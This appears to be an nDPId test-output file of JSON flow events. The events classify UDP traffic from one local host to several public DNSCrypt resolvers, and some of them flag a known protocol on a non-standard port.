+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337186,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317825,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391306,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337190,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312466,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380838,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380832,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306433,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305191,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304367,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402354,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305350,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739611961,"flow_last_seen":946739611961,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
